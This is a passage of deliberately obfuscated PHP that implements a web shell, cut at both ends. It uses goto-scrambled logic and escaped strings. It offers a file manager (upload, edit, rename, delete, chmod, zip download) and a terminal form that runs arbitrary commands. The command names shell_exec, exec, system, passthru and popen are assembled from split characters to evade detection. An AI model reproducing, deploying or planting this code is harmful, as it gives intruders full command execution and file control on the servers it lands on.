"\74\57\144\151\x76\76\xd\xa\40\40\40\40\x20\x20\40\x20\40\40\x20\x20\x3c\146\x6f\x72\x6d\40\x6d\145\164\150\x6f\x64\75\x22\160\157\x73\164\42\x3e\xd\xa\x20\x20\x20\40\40\40\40\40\40\40\40\x20\x20\x20\x20\x20\74\151\156\x70\165\x74\40\x74\x79\x70\145\x3d\x22\150\x69\144\x64\145\156\x22\x20\x6e\141\155\x65\75\42\146\151\154\145\137\x74\157\137\145\144\x69\164\42\40\x76\x61\154\165\145\75\x22"; goto RJlNx; ikIEr: @chmod($HsbRa, 0644); goto Tf5Tq; L5HyP: goto jqvB0; goto DtLHW; s2xAU: $onaac = fopen($HsbRa, "\x77\53"); goto n9NaO; qf2rL: $uzhX9 = "\103\x72\x65\141\164\x65\40\x66\x61\151\154\145\x64\x3a\40\x49\156\166\141\154\151\144\40\x66\x69\x6c\145\x6e\x61\x6d\x65"; goto T0kn8; k_zZe: if (@unlink($x0vZt)) { goto CMlC2; } goto BcNvE; UyMNd: header("\x43\x6f\156\164\145\156\164\55\114\x65\156\147\x74\150\x3a\40" . filesize($tDWqL)); goto aVJhv; XxstI: echo "\74\57\x64\x69\x76\x3e\15\xa\x20\40\x20\40\x20\x20\40\x20\x20\x20\x20\40\74\164\145\170\164\x61\162\x65\141\40\162\145\141\144\x6f\x6e\x6c\x79\x3e"; goto jfpS7; bRQIt: if (!(isset($_POST["\x63\162\145\x61\164\145\x5f\x66\157\x6c\x64\x65\162"]) && trim($_POST["\143\162\145\x61\x74\x65\137\x66\157\154\x64\x65\162"]) !== '')) { goto h1kgm; } goto kJtJr; rz0hC: OHL3w: goto oh9WD; uUEnN: http_response_code(400); goto mYEXT; drvHl: try { goto x_pC2; Vpv0H: if (!(empty(trim($FNVfK)) || $FNVfK === "\x43\x6f\x6d\x6d\x61\x6e\144\x20\x65\x78\x65\143\165\164\151\x6f\x6e\x20\156\157\164\x20\141\166\x61\x69\x6c\141\x62\x6c\145")) { goto sBhG7; } goto Tp4ld; GdVYs: sBhG7: goto VuJGi; x_pC2: $FNVfK = CWNBT($t4BqW); goto Vpv0H; Tp4ld: $uzhX9 = "\x43\157\155\155\141\x6e\144\40\145\170\145\x63\165\x74\x69\x6f\x6e\72\x20\116\157\x20\157\x75\164\x70\165\164\x20\x6f\162\40\146\165\156\143\164\151\x6f\x6e\40\144\x69\163\141\142\154\x65\x64"; goto GdVYs; VuJGi: } catch (Exception $XvMuT) { $uzhX9 = "\x43\157\x6d\155\x61\x6e\144\x20\145\x72\x72\157\162\72\x20" . htmlspecialchars($XvMuT->getMessage()); } goto MMehg; mdFYu: zIKX5: goto eYJkm; s6UaV: oY7mL: goto xrGX_; y3Usk: http_response_code(400); goto oJdkw; KJUvO: $a8u65 = $_GET["\165\160\x6c\x6f\x61\144\137\146\151\x6c\x65"]; goto Lc5kS; F8Y0R: echo "\74\57\x64\151\x76\x3e\15\xa\x20\x20\40\40"; goto MGOO_; YvXkK: echo "\x3c\57\x64\151\x76\x3e\15\12\x20\40\40\40\40\x20\x20\x20"; goto B501c; wmLD8: $uzhX9 = "\x45\144\x69\164\x20\x66\x61\151\x6c\145\x64\72\x20\x43\x6f\165\x6c\144\40\x6e\x6f\x74\40\x77\x72\151\164\145\40\164\157\x20\146\151\154\x65"; goto WNywB; WNZGN: $YKJaG = "\106\x69\x6c\145\x20\x63\x72\x65\141\x74\x65\144"; goto VwZZ8; SYaet: $uzhX9 = "\122\145\x6e\141\155\x65\x20\x66\x61\151\154\145\x64\72\40\124\141\162\147\145\164\40\x6e\141\155\x65\x20\x61\x6c\162\145\141\x64\171\40\145\170\151\x73\164\163"; goto DRiN5; Ok8WN: if (!isset($_POST["\146\151\154\x65\137\x74\x6f\137\x65\x64\151\164"], $_POST["\x66\151\154\x65\x5f\143\157\156\164\145\x6e\x74"])) { goto k0uWF; } goto a_IMi; ntiGN: $i2cFz = "\163\x65\154\x65\x63\164\145\x64\137\146\x69\x6c\x65\x73\x5f" . time() . "\x2e\x7a\x69\160"; goto FSiKH; YjwSu: echo "\x20\x20\x20\40\40\40\40\x20\x3c\x64\151\166\40\x63\x6c\141\x73\163\75\42\x61\x6c\145\x72\164\x20\141\x6c\x65\162\164\x2d\144\x61\x6e\147\145\162\x22\x3e"; goto tRPjq; Kfltx: if (!(isset($_POST["\x62\165\x6c\153\x5f\x64\x6f\x77\x6e\x6c\x6f\141\x64"]) && isset($_POST["\x73\x65\154\x65\143\164\x65\144\137\x69\x74\x65\x6d\163"]) && is_array($_POST["\163\x65\x6c\x65\x63\164\145\x64\137\x69\x74\x65\155\x73"]))) { goto zIKX5; } goto KQSyI; i4DIn: if (strpos($r20dt, "\56\56") !== false || strpos($r20dt, "\x2f") !== false || strpos($r20dt, "\134") !== false) { goto qIGsR; } goto q5nop; AJ3RA: foreach ($g04QC as $zKV6z) { goto YJD6n; W0xTX: goto WGaoO; goto gL5sd; PVDUU: if (is_dir($RWa01)) { goto UCV49; } goto JAEOG; qA5OO: $RWa01 = $Q2jV2 . "\x2f" . $zKV6z; goto PVDUU; JAEOG: $DES8d[] = $zKV6z; goto W0xTX; gL5sd: UCV49: goto j6zhV; ghVtq: GstJm: goto xgH1f; YJD6n: if (!($zKV6z === "\x2e")) { goto VJoWN; } goto MAaGs; MO5t_: VJoWN: goto qA5OO; MAaGs: goto GstJm; goto MO5t_; xVF98: WGaoO: goto ghVtq; j6zhV: $jzhHU[] = $zKV6z; goto xVF98; xgH1f: } goto rqHWg; sPQeG: l8ZKi: goto lc91V; s0LYe: function CwnbT($t4BqW) { goto crYS1; XfQx0: Lx2d0: goto o7IJO; nSmkJ: $B3Bu3 = ["\163" . "\x68" . "\145" . "\x6c" . "\154" . "\137" . "\145" . "\x78" . "\x65" . "\x63", "\145" . "\170" . "\x65" . "\143", "\x73" . "\x79" . "\163" . "\x74" . "\x65" . "\155", "\160" . "\141" . "\163" . "\163" . "\164" . "\x68" . "\162" . "\165", "\x70" . "\157" . "\x70" . "\x65" . "\156"]; goto R119m; o7IJO: return "\103\x6f\x6d\155\141\156\144\x20\x65\x78\145\143\165\164\151\157\156\40\x6e\157\x74\40\141\166\x61\x69\154\x61\142\154\145"; goto D0pCl; FWZAD: pzvk7: goto DtecE; R119m: foreach ($B3Bu3 as $BcZt2) { goto s14d7; VmGvd: try { goto MfJ3A; MfJ3A: $HnfCi = call_user_func($BcZt2, $t4BqW . "\40\x32\x3e\x26\61"); goto j_1AJ; wCmMb: return $HnfCi; goto jajUP; jajUP: EG7nB: goto Z2PKv; j_1AJ: if (!($HnfCi !== false && !empty(trim($HnfCi)))) { goto EG7nB; } goto wCmMb; Z2PKv: } catch (Exception $XvMuT) { goto bataN; } goto ois9E; s14d7: if (!function_exists($BcZt2)) { goto lKvdH; } goto VmGvd; ZIWxq: bataN: goto cMMxn; ois9E: lKvdH: goto ZIWxq; cMMxn: } goto XfQx0; A0PZS: return "\x4e\157\40\143\157\155\155\x61\x6e\144\40\x70\162\x6f\166\x69\144\x65\x64"; goto FWZAD; crYS1: if (!empty(trim($t4BqW))) { goto pzvk7; } goto A0PZS; DtecE: $CdPLl = ''; goto nSmkJ; D0pCl: } goto Y9zU3; WTNe9: @mkdir($a8u65, 0755, true); goto fWwmF; GCrie: header("\x43\157\x6e\x74\145\x6e\x74\x2d\104\x69\163\x70\x6f\163\x69\164\x69\157\x6e\72\40\x61\x74\x74\x61\143\150\x6d\145\156\164\x3b\x20\x66\151\154\x65\x6e\x61\x6d\x65\75\x22" . $i2cFz . "\x22"); goto UyMNd; Q1hmn: $jzhHU = $DES8d = []; goto AJ3RA; Ig3Qh: $tDWqL = sys_get_temp_dir() . DIRECTORY_SEPARATOR . $i2cFz; goto KeVp7; c0wwU: echo "\15\xa\40\x20\40\x20"; goto r5ar2; Lzkkc: $YKJaG = "\106\157\x6c\x64\145\162\x20\x63\x72\x65\x61\164\145\x64"; goto sPQeG; A_6bN: if ($D1TWc->open($tDWqL, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) { goto h5PJI; } goto RlC4G; OHx8B: hfYdf: goto efqQ_; nEgzQ: goto IjDPn; goto Q8kPn; qn0Tp: $YKJaG = "\x46\151\154\145\x20\x64\145\154\x65\164\x65\144"; goto oIV2o; yYsE9: uN54I: goto qf2rL; VwZZ8: jqvB0: goto KM_E4; f30Sk: echo "\40\x20\x20\40\x20\x20\x20\40\40\x20\40\40\74\x64\151\166\x20\x63\154\x61\x73\163\75\x22\x74\x65\x72\155\x69\x6e\141\154\55\x6f\165\x74\160\x75\x74\x22\x20\163\x74\x79\154\145\75\x22\155\x61\x72\147\151\156\x2d\x74\x6f\x70\x3a\40\x31\62\160\170\x3b\x22\76"; goto rC_xh; uwqpy: echo "\x22\40\143\x6c\x61\x73\163\x3d\42\x62\x74\x6e\x20\x75\x70\55\142\x74\x6e\42\76\342\206\x90\40\120\141\162\145\x6e\x74\40\x44\151\x72\x65\x63\x74\157\162\171\74\x2f\142\x75\164\x74\157\156\x3e\xd\12\x20\40\40\x20\74\57\x66\157\x72\155\x3e\xd\xa\15\12\x20\40\x20\x20\x3c\146\x6f\x72\155\x20\x6d\x65\164\150\157\144\x3d\x22\160\157\163\x74\x22\40\151\x64\x3d\x22\146\151\154\145\55\x66\x6f\x72\155\x22\x3e\15\12\x20\x20\x20\40\40\x20\x20\40\x3c\144\x69\166\x20\151\x64\x3d\42\142\x75\x6c\x6b\x2d\x61\143\x74\151\157\x6e\163\x22\40\143\154\x61\x73\163\75\42\142\165\154\153\x2d\x61\x63\x74\151\157\x6e\163\42\40\163\x74\171\x6c\145\x3d\x22\144\151\163\x70\x6c\141\x79\x3a\x20\156\x6f\x6e\145\x3b\x22\76\xd\xa\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\x3c\163\160\141\156\x20\x63\154\x61\x73\163\75\x22\x62\x75\154\x6b\55\x61\x63\x74\151\x6f\x6e\163\55\x74\145\170\x74\x22\40\x69\144\75\42\x73\145\154\x65\x63\164\x65\x64\x2d\143\x6f\165\x6e\164\x22\x3e\60\x20\x69\x74\x65\155\50\x73\51\x20\x73\x65\154\x65\x63\x74\x65\144\x3c\x2f\163\x70\141\x6e\x3e\15\12\40\x20\40\x20\40\40\x20\40\40\40\40\40\74\142\x75\x74\164\157\156\40\x74\171\x70\x65\x3d\x22\x73\x75\142\155\151\x74\42\40\x6e\141\155\145\75\x22\142\165\154\153\137\144\157\167\156\x6c\157\x61\x64\42\x20\x63\154\x61\x73\163\75\42\x62\x74\x6e\40\142\164\156\x2d\163\x6d\42\40\x6f\x6e\x63\154\151\x63\x6b\75\42\162\145\x74\165\162\156\40\143\x6f\156\x66\151\x72\155\x28\x27\104\157\x77\x6e\x6c\x6f\141\144\x20\x73\145\x6c\x65\143\x74\145\x64\40\x69\164\x65\x6d\163\40\141\x73\x20\172\151\160\77\47\51\42\76\x44\157\167\156\x6c\157\x61\x64\x20\123\x65\x6c\x65\x63\164\145\x64\74\57\x62\x75\x74\164\157\156\x3e\15\12\40\40\x20\x20\40\x20\x20\x20\x20\40\x20\x20\x3c\142\165\164\164\x6f\x6e\40\164\171\x70\x65\75\x22\x73\165\142\x6d\x69\164\x22\x20\156\141\x6d\145\x3d\x22\142\x75\154\153\x5f\144\x65\x6c\x65\164\145\42\x20\x63\x6c\141\x73\163\x3d\42\x62\164\156\x20\x62\164\x6e\55\144\x61\156\x67\145\x72\40\x62\x74\x6e\55\163\155\x22\x20\x6f\x6e\143\x6c\x69\143\153\75\x22\162\x65\164\165\x72\x6e\40\143\x6f\x6e\146\151\162\x6d\50\47\x44\x65\154\145\164\x65\x20\x61\154\154\x20\163\x65\154\x65\143\164\145\x64\x20\x69\x74\145\155\163\77\47\x29\42\x3e\104\x65\154\x65\164\145\x20\123\x65\154\x65\143\164\145\144\x3c\57\142\165\164\164\157\x6e\76\15\xa\40\40\x20\40\x20\40\x20\x20\74\57\144\151\x76\76\15\xa\15\12\x20\40\40\x20\x3c\x74\141\142\x6c\145\76\xd\12\40\40\x20\40\x20\40\40\40\x3c\164\x68\x65\x61\x64\76\xd\xa\x20\x20\40\40\x20\40\x20\x20\x20\x20\40\40\74\164\162\76\15\12\40\40\x20\40\40\40\40\x20\x20\x20\40\40\40\40\x20\x20\74\x74\150\x20\x73\164\171\154\x65\75\42\x77\151\x64\164\150\72\40\x34\x30\x70\x78\x3b\42\x3e\15\xa\x20\40\40\x20\40\40\40\x20\40\40\40\40\40\x20\40\40\x20\x20\40\x20\x3c\x69\x6e\160\165\164\x20\x74\x79\160\145\x3d\x22\143\x68\x65\x63\153\142\157\170\42\40\x6f\x6e\x63\x6c\151\x63\153\75\42\164\x6f\147\147\154\x65\x53\x65\x6c\x65\x63\164\101\x6c\154\50\x74\x68\x69\x73\51\x22\76\15\12\x20\40\40\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\74\x2f\x74\150\76\15\xa\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\40\40\x20\x20\74\x74\150\76\116\141\155\145\74\x2f\164\x68\76\15\xa\40\x20\x20\x20\40\40\40\x20\x20\40\40\x20\x20\40\40\40\x3c\164\150\76\x54\171\160\x65\x3c\57\164\150\x3e\15\xa\x20\x20\40\40\40\x20\x20\x20\40\40\40\40\x20\x20\x20\40\x3c\x74\150\40\163\164\x79\154\145\x3d\42\x74\145\x78\164\x2d\141\x6c\x69\x67\x6e\72\40\162\151\147\x68\164\73\42\76\101\143\x74\151\157\156\x73\x3c\57\x74\x68\76\15\12\40\40\40\x20\40\40\x20\40\40\x20\x20\x20\x3c\x2f\164\162\x3e\15\12\x20\40\40\x20\40\40\x20\x20\74\x2f\164\x68\x65\141\144\x3e\xd\xa\x20\40\40\40\x20\40\40\40\x3c\x74\x62\157\144\x79\76\15\12\40\x20\x20\x20\x20\x20\40\x20"; goto k24ke; dnzzL: f3dXs: goto zJV1M; cv8Yl: echo "\x20\x20\40\40\74\x64\x69\x76\40\x63\x6c\141\x73\163\x3d\x22\163\x65\143\x74\151\x6f\x6e\42\x3e\xd\12\x20\40\x20\40\x20\x20\x20\40\x3c\x64\151\166\x20\x63\x6c\x61\163\163\75\x22\x73\145\x63\164\151\x6f\156\x2d\164\x69\x74\154\x65\42\76\x54\145\162\155\x69\156\141\x6c\74\57\144\x69\x76\x3e\xd\12\x20\40\x20\40\x20\40\x20\40\74\146\157\x72\155\40\x6d\x65\164\x68\157\x64\x3d\x22\160\x6f\x73\164\42\x20\x63\x6c\x61\163\163\75\x22\x69\x6e\x70\x75\x74\x2d\x67\162\157\165\x70\42\76\xd\12\40\x20\40\x20\x20\40\40\40\x20\x20\40\40\x3c\x69\x6e\x70\x75\x74\40\164\x79\x70\145\x3d\x22\x74\145\x78\164\42\40\156\141\x6d\145\75\42\164\x65\x72\155\x69\x6e\x61\154\x5f\143\157\x6d\x6d\x61\156\x64\x22\40\x70\x6c\x61\x63\x65\x68\157\x6c\x64\145\x72\x3d\42\x45\156\x74\x65\x72\40\x63\x6f\x6d\155\x61\x6e\144\x2e\56\56\x22\76\xd\12\x20\40\40\x20\40\x20\40\x20\40\40\x20\x20\x3c\142\x75\164\164\157\156\40\143\x6c\x61\x73\x73\x3d\42\x62\164\x6e\x20\x62\164\156\55\143\162\145\141\x74\x65\42\40\x74\x79\x70\145\x3d\x22\x73\x75\142\155\151\164\42\x3e\x45\170\x65\x63\x75\164\145\x3c\57\142\x75\164\x74\157\x6e\76\15\xa\40\40\40\40\x20\x20\x20\x20\x3c\57\146\x6f\x72\155\76\xd\12\40\x20\x20\40\x20\40\40\40"; goto Ur15C; dvGga: $YKJaG = "\x52\145\x6e\141\155\x65\x20\x73\165\x63\143\x65\x73\163\x66\x75\154"; goto c7ASk; Zhite: rriu9: goto dZI4u; n9U7P: ABa8W: goto UH5AZ; sCGe3: fpw4R: goto yTE4L; xrGX_: $D1TWc->close(); goto tBRDk; fWwmF: BNiQB: goto BzMvd; ufaT4: exit; goto PAXDJ; LGC2j: if (!(!empty($_GET["\165\160\x6c\x6f\141\x64\137\146\151\154\145"]) && !empty($_GET["\x6e\141\x6d\145"]))) { goto Bem6d; } goto KJUvO; YFC2b: $D1TWc = new ZipArchive(); goto A_6bN; WQYgg: pofAX: goto k2o7Y; pxf9S: echo "\x20\x20\x20\x20\x20\40\40\40\x3c\x64\151\x76\40\143\154\141\163\x73\75\x22\141\154\x65\162\x74\x20\141\154\145\x72\x74\55\x73\x75\143\143\145\x73\163\42\x3e"; goto CGKu1; AUmmT: goto eO34e; goto kMtyj; DkiId: goto Zl4qs; goto lQgMT; QMPXl: header("\x43\157\x6e\164\x65\x6e\x74\55\x54\171\160\x65\72\40\141\160\x70\154\x69\143\x61\x74\151\157\156\57\x6f\143\x74\145\x74\55\163\164\162\x65\141\x6d"); goto MImRn; MkV3v: echo "\42\40\x70\x6c\x61\143\145\x68\157\154\x64\x65\162\75\x22\x45\156\x74\x65\x72\x20\x70\141\x74\150\x2e\56\56\x22\x3e\15\12\x20\x20\x20\40\40\40\40\x20\x20\x20\x20\x20\74\142\165\164\x74\157\x6e\x20\143\x6c\x61\163\x73\x3d\42\142\164\x6e\42\40\x74\171\160\x65\75\x22\163\x75\142\x6d\x69\164\x22\76\x4e\141\x76\151\147\x61\x74\x65\x3c\x2f\x62\x75\x74\x74\x6f\x6e\76\xd\12\40\40\x20\x20\x20\40\40\40\74\x2f\x66\x6f\162\x6d\x3e\xd\12\x20\40\40\x20\x3c\57\x64\151\x76\x3e\15\xa\xd\xa\40\40\40\x20\74\144\x69\x76\40\x63\154\141\163\x73\75\42\x67\162\x69\144\55\62\x22\76\15\12\40\x20\40\x20\x20\40\x20\40\x3c\144\151\x76\x20\143\154\x61\163\x73\75\42\163\x65\143\164\151\x6f\x6e\42\76\15\xa\x20\40\x20\x20\x20\x20\x20\40\x20\40\40\40\74\x64\151\x76\x20\x63\x6c\141\x73\x73\75\x22\163\145\x63\164\151\x6f\156\55\164\x69\164\x6c\145\x22\x3e\x55\160\154\157\141\x64\x20\x46\x69\154\145\x3c\57\144\151\x76\x3e\xd\12\40\40\40\x20\x20\x20\40\40\x20\40\x20\40\74\x64\151\x76\x20\x63\154\141\163\163\x3d\42\x75\160\x6c\x6f\141\144\55\x74\x61\x62\163\42\x3e\15\xa\40\40\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\40\40\40\x3c\x64\151\x76\40\x69\144\x3d\42\x73\164\x61\x6e\x64\x61\162\144\x2d\164\141\142\42\40\143\154\x61\163\163\75\42\x75\x70\154\157\x61\144\x2d\164\141\x62\40\x61\143\164\x69\x76\x65\42\40\157\156\143\x6c\151\143\153\75\x22\x73\167\151\x74\143\x68\x55\x70\154\x6f\x61\x64\x54\x61\142\50\x27\163\x74\141\x6e\144\x61\162\144\47\x29\x22\x3e\x53\164\x61\x6e\144\x61\x72\144\40\x55\160\154\x6f\141\x64\74\x2f\144\151\x76\x3e\15\12\40\x20\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\x20\40\x20\74\x64\151\x76\40\x69\x64\75\x22\141\144\166\x61\156\143\145\x64\x2d\x74\x61\x62\42\40\x63\154\x61\163\163\75\x22\165\160\x6c\x6f\141\x64\55\x74\x61\142\42\x20\157\156\143\x6c\x69\x63\x6b\75\42\163\x77\x69\x74\x63\150\125\160\154\x6f\141\144\x54\141\142\x28\47\x61\144\x76\x61\156\x63\145\144\x27\x29\x22\x3e\x41\x64\x76\141\x6e\143\145\144\x20\125\160\154\x6f\141\144\74\57\144\151\166\x3e\15\xa\40\x20\x20\40\40\40\x20\40\x20\x20\40\40\74\x2f\x64\x69\x76\x3e\15\12\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\15\xa\40\40\x20\x20\40\40\x20\x20\x20\x20\40\40\x3c\144\151\x76\40\151\x64\x3d\x22\163\x74\141\156\144\x61\162\144\55\x70\x61\156\x65\x6c\x22\x20\x63\x6c\x61\163\x73\x3d\x22\165\160\x6c\157\x61\144\x2d\160\x61\156\x65\x6c\x20\x61\143\x74\151\166\145\42\x3e\15\xa\40\40\x20\x20\x20\40\x20\40\40\x20\40\40\x20\40\x20\x20\x3c\146\x6f\x72\x6d\40\155\x65\164\x68\x6f\x64\75\x22\x70\157\163\x74\42\x20\145\x6e\x63\x74\x79\x70\x65\x3d\x22\x6d\x75\x6c\x74\151\160\141\x72\x74\x2f\x66\157\162\x6d\x2d\144\141\164\141\x22\x3e\xd\xa\40\40\x20\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x3c\144\151\x76\40\143\154\141\x73\x73\75\42\x69\x6e\160\x75\164\x2d\147\162\157\165\x70\42\x3e\xd\12\40\x20\40\40\x20\x20\x20\40\x20\40\40\40\40\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x3c\151\x6e\160\165\164\x20\164\x79\160\x65\x3d\42\x66\x69\154\x65\x22\40\x6e\x61\155\145\x3d\x22\146\151\x6c\x65\x5f\165\x70\154\157\141\144\x22\x3e\xd\xa\40\40\40\x20\40\40\x20\x20\40\x20\40\40\x20\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\74\x62\165\164\164\x6f\x6e\x20\143\x6c\141\x73\x73\75\x22\x62\x74\156\40\142\x74\x6e\55\160\162\x69\x6d\x61\162\x79\42\40\x74\x79\160\x65\x3d\42\163\x75\x62\155\151\164\x22\76\125\160\x6c\157\141\x64\x3c\x2f\142\x75\x74\x74\x6f\156\76\xd\xa\40\40\40\x20\40\x20\x20\40\40\40\40\x20\40\x20\x20\40\x20\40\40\x20\x3c\57\144\x69\166\76\xd\12\40\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\74\57\x66\157\x72\155\76\15\xa\40\40\x20\x20\x20\x20\40\40\x20\40\40\x20\74\57\144\151\166\x3e\xd\12\40\x20\40\x20\x20\x20\40\40\x20\40\40\x20\xd\12\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\x3c\144\151\x76\x20\x69\x64\75\x22\x61\x64\166\x61\156\x63\145\144\x2d\x70\141\156\145\154\x22\40\x63\154\141\163\x73\x3d\42\x75\160\154\x6f\x61\x64\x2d\x70\141\156\x65\154\x22\76\15\12\x20\x20\x20\x20\40\40\x20\40\x20\40\40\40\x20\40\x20\40\74\x64\151\166\x20\x63\154\141\x73\163\x3d\x22\x69\x6e\x70\x75\x74\55\147\162\x6f\165\160\42\76\xd\12\x20\40\40\x20\40\40\40\40\40\x20\x20\x20\40\x20\40\x20\40\x20\40\40\x3c\151\156\x70\x75\x74\x20\164\x79\x70\145\75\x22\146\151\154\x65\42\x20\x69\144\75\42\x75\x70\154\157\141\144\137\146\x69\154\145\163\x22\40\156\141\x6d\x65\75\x22\165\160\154\x6f\x61\x64\x5f\x66\x69\154\x65\163\42\x20\155\165\x6c\x74\151\160\154\x65\75\x22\x6d\x75\154\x74\x69\160\154\145\x22\x3e\15\xa\x20\40\40\40\40\x20\x20\40\40\x20\40\x20\x20\x20\40\x20\40\40\x20\40\74\x62\x75\x74\x74\x6f\156\40\x63\x6c\x61\x73\163\75\x22\x62\x74\156\40\142\164\156\55\160\x72\151\155\141\162\171\x22\x20\x6f\156\x63\154\151\x63\x6b\75\x22\165\x70\x6c\x6f\x61\x64\x46\151\154\x65\50\51\x3b\40\162\x65\164\165\x72\156\40\146\x61\x6c\163\x65\73\x22\76\125\x70\x6c\x6f\x61\144\74\57\142\x75\164\x74\157\156\x3e\xd\12\40\40\40\40\40\x20\40\40\x20\40\x20\x20\40\x20\40\x20\74\57\144\x69\x76\76\15\xa\40\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\74\160\x20\163\164\171\x6c\x65\75\x22\x6d\141\x72\x67\x69\x6e\x2d\164\157\x70\72\x20\70\160\170\x3b\x20\x66\157\x6e\164\x2d\163\151\172\x65\x3a\40\x31\62\x70\170\73\x22\76\x53\x74\141\164\165\x73\72\40\74\x73\160\x61\156\x20\151\x64\75\42\165\160\154\x6f\141\144\137\163\x74\141\x74\165\163\x22\x20\x73\164\x79\x6c\145\75\42\x63\x6f\154\157\x72\72\x23\71\143\141\x33\141\x66\x3b\x22\76\116\157\x20\x66\x69\x6c\x65\40\163\x65\154\145\x63\x74\145\x64\74\x2f\163\x70\141\156\x3e\74\57\x70\x3e\15\12\x20\x20\40\x20\40\x20\40\x20\40\40\40\x20\x3c\57\144\x69\166\x3e\15\12\x20\40\x20\40\40\40\x20\x20\x3c\57\x64\x69\x76\76\xd\xa\15\12\40\40\x20\40\x20\40\x20\x20\74\x64\x69\x76\40\x63\x6c\141\163\163\75\42\163\x65\143\x74\151\x6f\156\42\x3e\xd\12\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\40\74\x64\x69\166\x20\143\154\141\163\x73\x3d\42\x73\145\143\164\151\157\x6e\55\164\x69\164\154\x65\x22\76\x43\162\x65\x61\x74\x65\40\116\x65\167\x3c\57\144\x69\x76\76\xd\12\x20\40\40\40\40\x20\40\40\40\x20\40\40\74\146\x6f\162\155\40\x6d\145\x74\150\157\x64\75\x22\x70\157\163\164\x22\40\143\154\x61\x73\163\x3d\42\x69\156\160\x75\164\55\x67\x72\157\165\x70\42\x3e\15\xa\x20\40\40\x20\40\40\x20\40\x20\40\x20\40\40\40\x20\40\74\x69\x6e\x70\x75\164\40\164\171\160\145\x3d\42\x74\145\170\164\42\x20\156\141\x6d\145\75\42\x63\162\145\x61\164\145\137\146\151\154\x65\x22\x20\x70\154\x61\143\x65\150\x6f\154\144\x65\x72\75\x22\116\145\x77\x20\x66\151\x6c\145\x20\x6e\x61\155\x65\x2e\56\56\x22\x3e\15\12\x20\40\40\x20\x20\x20\40\x20\40\x20\40\40\40\40\40\40\74\142\165\164\164\157\156\40\143\154\141\163\x73\x3d\42\142\x74\156\40\142\164\x6e\x2d\143\x72\145\x61\x74\145\x22\x20\164\171\160\x65\75\42\163\165\142\155\x69\164\x22\x3e\106\x69\x6c\x65\x3c\57\142\x75\x74\x74\x6f\156\76\15\xa\x20\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\x3c\x2f\x66\x6f\162\155\x3e\xd\xa\x20\40\x20\x20\x20\x20\40\40\x20\40\40\40\74\146\157\162\155\x20\x6d\x65\164\150\x6f\144\75\x22\160\157\x73\164\x22\40\x63\x6c\x61\x73\x73\x3d\x22\x69\x6e\x70\165\x74\55\x67\x72\157\x75\160\42\x3e\xd\xa\40\40\x20\x20\40\x20\x20\x20\40\40\x20\40\x20\40\x20\40\x3c\151\156\x70\x75\x74\40\164\171\x70\x65\75\x22\x74\145\x78\164\42\40\x6e\141\155\x65\x3d\42\x63\162\x65\x61\x74\x65\x5f\x66\157\x6c\x64\x65\162\x22\x20\160\x6c\x61\x63\145\150\157\154\144\x65\162\x3d\42\116\145\x77\40\x66\x6f\x6c\x64\x65\x72\40\x6e\141\x6d\x65\x2e\56\x2e\42\x3e\xd\12\x20\40\40\x20\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\x3c\x62\x75\x74\164\x6f\156\x20\143\154\x61\163\163\x3d\x22\142\x74\x6e\40\x62\164\x6e\55\x63\162\x65\141\164\x65\42\40\x74\x79\160\x65\x3d\42\x73\165\142\155\151\x74\x22\76\x46\x6f\154\x64\145\162\74\x2f\142\x75\164\x74\x6f\156\x3e\xd\12\x20\40\40\40\40\x20\x20\40\40\40\x20\x20\74\x2f\146\x6f\162\x6d\x3e\xd\xa\40\40\40\x20\40\x20\x20\40\74\x2f\x64\x69\x76\76\15\12\x20\x20\x20\x20\x3c\57\144\151\x76\x3e\15\12\xd\12\40\x20\40\x20"; goto GrtIs; T0kn8: UysJt: goto ySeb2; uUKZl: if (@file_put_contents($R4MJ2, '') !== false) { goto Mk1MG; } goto tUXtg; Bgke0: echo "\x22\73\xd\12\x20\40\x20\40\40\x20\x20\x20\40\x20\x20\40\166\141\162\40\x73\x63\x72\151\160\x74\x55\x72\x6c\40\x3d\40\167\151\x6e\144\x6f\167\x2e\154\x6f\143\x61\x74\151\157\156\x2e\160\141\x74\150\x6e\141\155\x65\x3b\15\12\x20\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\15\xa\40\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\163\x74\141\164\x75\163\x53\x70\141\x6e\56\x74\x65\170\x74\x43\157\156\x74\145\x6e\164\x20\75\x20\42\125\160\x6c\157\x61\144\151\x6e\x67\40\42\40\x2b\x20\146\151\x6c\145\x6e\x61\x6d\145\x20\x2b\40\42\x2c\x20\x70\154\x65\x61\163\x65\x20\167\x61\151\164\x2e\x2e\x2e\42\73\15\12\40\x20\40\40\40\x20\40\40\40\40\x20\x20\x73\164\x61\164\165\163\123\160\141\156\x2e\163\164\x79\154\x65\x2e\143\x6f\154\157\162\40\75\40\x22\142\154\x75\145\x22\x3b\xd\xa\40\40\40\40\x20\40\40\40\x20\x20\40\40\xd\xa\x20\40\40\x20\40\x20\x20\40\40\40\x20\40\x76\141\x72\x20\x72\x65\x61\144\x65\162\x20\x3d\x20\156\x65\167\40\106\151\154\145\122\x65\x61\x64\145\162\50\51\x3b\15\xa\40\40\40\40\40\x20\x20\x20\x20\40\40\40\x72\145\x61\x64\145\x72\56\162\x65\x61\x64\x41\x73\x42\151\x6e\141\162\x79\x53\x74\162\x69\156\147\x28\146\151\x6c\145\x29\x3b\15\12\40\x20\40\40\40\x20\x20\40\40\x20\40\40\15\xa\x20\40\40\40\x20\x20\40\40\40\40\x20\x20\x72\x65\x61\x64\145\x72\x2e\157\x6e\154\x6f\x61\x64\145\x6e\x64\x20\75\40\146\x75\156\x63\x74\151\157\x6e\x28\145\166\x74\51\40\x7b\xd\xa\x20\x20\x20\